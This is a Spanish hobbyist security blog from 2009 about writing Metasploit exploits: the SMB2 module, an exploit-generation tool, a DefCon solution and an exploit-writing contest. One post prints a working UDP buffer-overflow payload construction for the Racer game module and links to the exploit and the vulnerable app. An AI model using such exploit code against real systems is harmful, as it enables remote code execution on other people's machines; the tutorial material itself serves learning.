lunes, 28 de septiembre de 2009

La guinda del pastel de SMB2

Bueno, hace tiempo os sonaría haber oido algo de que se había encontrado un fallo en windows vista y 7 que podía ser afectado de forma bestia por redes. Y aunque fue categorizado como DOS primeramente por Laurent Gaffié, el cual no pensaba que fuera posible explotar, después de una llamada de atención por parte de algunos, yo sólo sé de 48bits.com así que no sé si fueron los primeros. Decían en su blog que era posible explotarlo y así fue, no tardarían en investigar la gente el tema. Y hasta ahora todo era privado, pero metasploit lo acaba de publicar: http://metasploit.com/svn/framework3/trunk/modules/exploits/windows/smb/smb2_negotiate_func_index.rb

Os recomiendo echarle un ojo para aprender bastante, ya que han ido explicando los autores como lo han hecho.

Un saludete

domingo, 16 de agosto de 2009

Proyecto EEW(Expert Expoit Writer)

Os voy a hablar de un proyecto que se traen entre manos desde hace tiempo boken y yibam.

El proyecto en sí es la creación de una herramienta capaz de generar exploits a partir de un PoC en ficheros script de python completamente funcionales por sí solos.

Os copio parte de los blogs de yibam y boken:

El usuario indicaría la longitud de la cadena que provoca el Buffer Overflow, la via por la cual el software vulnerable es capaz de recibir dicha cadena. Por linea de comandos, en forma de fichero interpretables por el software vulnerable, por conexión de red (socket), como argumento de una función de una libreria .dll, etc... Y la herramienta comienza todo el proceso de análisis.

El análisis automático que realiza la herramienta, consiste en montar la PoC y lanzarlo contra el software vulnerable para provocar el crash de Access Violation. Debido a la infinidad de casos, la herramienta va salvando los diferentes obstáculos (AntiDEP, SafeSEH, excepciones de escritura o lectura de ciertas direcciones, localización de direcciones validas para hacer un trampolin valido, etc...) hasta llegar a sobreescribir EIP y con toda esa información, crear un script .py que al lanzarlo de manera independiente, sea capaz de ejecutar una shellcode explotando el fallo indicado por la PoC en el software vulnerable.

----

Bueno, os dejo que descubrais vosotros mismo las grandes utilidades que va a tener, de momento se puede usar en modo API, y como bien dicen ellos, el framework Sulley...que es para fuzzing, se podría acoplar y hacer...maravillas!!! ejeje

En el apartado de links de distintos blogs aparecen los blogs de yibam y boken y el link del proyecto es el siguiente:EEW(Exploit Expert Writer)

La única pega que le pongan el nombre en inglés jejej

lunes, 20 de julio de 2009

Pwtent Pwnables 100 - Solucion Defcon

Ya que hace tanto que no escribo en el blog, os dejo un zip con una solución de una prueba de la DefCon que trataba del tema que más me gusta, el exploiting jeje.

Ahí tenéis el link para descargar: 100 Pwtent Pwnables

Decir que el zip contiene pdf y docx, además de incluir otros archivos que en el pdf no he podido meter o se ven mal. En el documento docx está todos los archivos incluidos y la imagen si se ve bien.(El pdf lo cree desde el office, por eso se ve mal xD).

Espero que os guste y cualquier duda o sugerencia, son bienvenidas :p

Por cierto, contiene un exploit remoto hecho para metasploit :P

domingo, 21 de junio de 2009

Fin de curso

Pues eso, al haber acabado el curso, ya por fin tendré tiempo para escribir por aquí y por allá, y actualizarme que llevo tiempo sin hacerlo y bueno hacer alguna salida por ahí como la del Asegura IT, que menudos cracks habia juntos.

Seguiré con los exploits que hice hace tiempo para el concurso, los cuales algunos ya están en metasploit oficialmente y bueno, veremos a ver si puedo sacar los concursos de exploiting de crackslatinos, que hay uno muy interesante que si lo hago, me cargo el DEP de forma brusca y a lo bestia.

Luego seguiré si tengo tiempo con los retos(haciendo y jugando xD)

Y a ponerse con hacking web, reversing y exploiting en linux, y lo que de tiempo.

miércoles, 4 de marzo de 2009

Metasploit -> MSFXDC(Protocolo UDP)

Remotos:
UDP: racer_bof.rb

Descripcion: Racer v0.5.3 beta 5(09-03-07):
Es un exploit que trata sobre un juego de carreras y que escucha en un puerto, el 26000(UDP).
Esto ya nos da bastantes pistas para comenzar.

Requisitos:
De momento vamos a abrir los archivos que tratan de las conexiones UDP.

1º-C:\Documents and Settings\user\Datos de programa\msf32\lib\msf\core\exploit\udp.rb
2º-C:\Documents and Settings\user\Datos de programa\msf32\lib\rex\socket\udp.rb

Está bastante comentado así que podeis entenderlo fácilmente si estáis relacionados con
la programación en ruby u otro lenguaje que se le parezca.


Exploit:
Hay que incluir una línea para indicar que usaremos ese protocolo, justo despeus de definir
la clase Metasploit3
########################################################################################################
include Msf::Exploit::Remote::Udp
########################################################################################################

En la definicion de exploit, podemos poner varias lineas:
########################################################################################################
connect_udp #--> Crea una conexion con el protocolo udp para enviar datos

buf = 'A' * 1001 + [target.ret].pack('V') + payload.encoded + 'B' * (1196 - payload.encoded.length)

udp_sock.put(buf) #--> Envia mediante udp lo que hay en buf, este es el único definido en el 2º archivo.

handler #--> Controla la conexion

disconnect_udp #--> Y termina la conexion
########################################################################################################

Tambien es importante la siguiente parte de código que va en otra parte dentro del exploit:
########################################################################################################
register_options(
[
Opt::RPORT(26000) #Puerto especificado por defecto
], self.class)
########################################################################################################

Download App Vuln: https://www.securinfos.info/old_softwares_vulnerable/racer053b5.rar

Link del exploit: https://www.securinfos.info/metasploit/racer_bof.rb ó http://www.metasploit.com/modules/exploit/windows/games/racer_503beta5

--------------------------------------------

Bueno en principio tenía pensado depurarlo de nuevo para ver mejor el espacio real para la shellcode y ajustarlo en el exploit, o badchars e incluso referencias, pero ando bastante jodido de tiempo, así que si alguno quiere bienvenido sea. Además me imagino que la dirección de la dll es universal, pero podéis agregar otras versiones que seguramente sea vulnerable en otras y asi hacerlo más universal todavía :P

Saludos y espero que a alguno le sirva.

martes, 24 de febrero de 2009

Ausencia de posts xD

Bueno tengo en mente tratar algunas cosas que he dicho que iba a tratar pero por circunsanticas personales no he podido así que a partir del finde espero rellenar el blog con algunso temas de exploits que me quedé a medias y alguna cosilla más.

Saludos si alguien me lee jeje.

sábado, 14 de febrero de 2009

Exploits hechos para el MSFXDC(1)

Bueno en determinados temas del blog iré mostrando los exploits hechos y además como han sido desarrollados y los que no hice desde 0, serán llevados del lenguaje que tuvieran en milw0rm a ruby para metasploit. Iré mostrando las similitudes que tienen entre ellos y cómo es fácil desarrollar un exploit que se basa en los mismos tipos de vulnerabilidades, locales, remotos, mismos protocolos, etc. Metasploit está preparado para gran número de exploits aunque todavía le faltan algunos protocolos para no tener que enviar muchos bytes de un protocolo en especial mediante tcp/ip.

De forma general los divido en 3 categorías, entendéreis el porqué.
Voy a dividir los exploits remoto de manera que los 2 primeros tipos son genéricos y cuando vayan saliendo protocolos conocidos FTP, SMTP, IMAP...etc, los iré poniendo separados. Por ejemplo en las siguientes categorías:

REMOTOS:
::TCP
::UDP
::FTP
::Otros Protocolos(IMAP,SMTP...)
::Explotados con Navegador(Especialmente Activex)

LOCALES:
::FILEFORMAT

WEBAPP:
::RFI
::RCE

Muchos de los subtipos, se pueden hacer de forma casi genérica, sólo cambiando lo esencial.
Como dije iremos viendo de todo tipo, mientras tanto boken escribirá algo más relacionado con Metasploit en general, que cómo veréis será muy interesante.
Con esto aprenderéis la forma rápida de hacer vuestro exploit y de probar con el mismo Metasploit si no sabéis programar con protocolos.

Decir, que estéis atentos a la herramienta de Jerome Athias, MSF-XB:
https://www.securinfos.info/metasploit/MSF-XB.php

Más que nada, porque se va actualizando y hablaré con él la forma de poder elegir para hacer ciertos exploits. Para que sea casi for dummies jeje, para así hacer de Metasploit una herramienta muy buena para las auditorías.

martes, 3 de febrero de 2009

MetaSploit Framework eXploits Development Contest

Feliz 2009, más que nada porque llevo más de dos meses sin escribir por aquí jeje. Y bueno aprovecho el primer post de este año a este concurso.

El concurso organizado por Jerome Athias de JA-PSI, trataba de conseguir el mayor número de puntos. Éstos se podían conseguir dependiendo del tipo de exploit que hicieras, si era un poc, un exploit para aplicaciones web, o si eran locales o remotos funcionales. Todo ello portado para metasploit. En el link del final tenéis mejor la info del concurso y los exploits mandados al mismo.

La verdad fue un mes duro ya que todo exploit portado de milw0rm a metasploit tenía que probarlo en mi máquina, ello implica buscar la app vulnerable, ajustarlo a mi sistema y que funcione de forma simple(Se irán mejorando con tiempo), y muchos de los probados ya estaban en metasploit o directamente la gente los envió a milw0rm como buenos y luego realmente tienen filtros u otras cosas que hacen que no funcionen. Vamos que sobreescriben el ret con AAAA y luego los 4 siguientes BBBB, y como eip es 41414141 y esp 42424242, a la hora de modificarlo ponen una shellcode cualquiera y un salto a esp en EIP y aunque no lo prueben lo mandan...Eso lo ví en varios desbordamientos de pila.

Además, aunque personalmente veía mal que enviasen webapp porque metasploit está enfocado más en otro tipo de aplicaciones, me puse a fondo para conseguir ventaja y hasta envié yo webapp sin probar, pero que modificados casi nada, son todos iguales(los RFI jeje).

Así que después de tanto currar al final tuve lo prometido, gané y me enviaron el premio sin problemas a mi cuenta, y además estoy apuntado para la FRHACK, conferencia a la que me gustaría ir, si alguien de España lee esto y se apunta que me diga que voy sólo jeje. Hablaré de ella en otro momento :D.

Finalmente, agradecer a Jerome Athias porque las veces que hablé con él fue muy majo y por organizar este tipo de concursos, que más que nada era me animaba a hacer exploits para metasploit, cosa que tenía pensado hacer pero que nunca me animaba.
Así que parte de lo aprendido, lo plasmaré en algún lugar o mi amigo Boken lo hará con sus tutos.

Tutos para hacer exploits para metasploit:
Desarrollo de Exploits para Metasploit 3 desde cero - Parte 1 - Boken
Desarrollo de Exploits para Metasploit 3 desde cero - Parte 2 - Boken
Desarrollo de Exploits para Metasploit 3 desde cero - Parte 3 - +NCR CRC!

Además os digo que si tenéis app vulnerables que no estén en la lista siguiente, hacérmelo saber a mi o a la cuenta de correo que sale en la siguiente web:
https://www.securinfos.info/old-softwares-vulnerable.php

Link del concurso:
https://www.securinfos.info/metasploit/msfxdc.php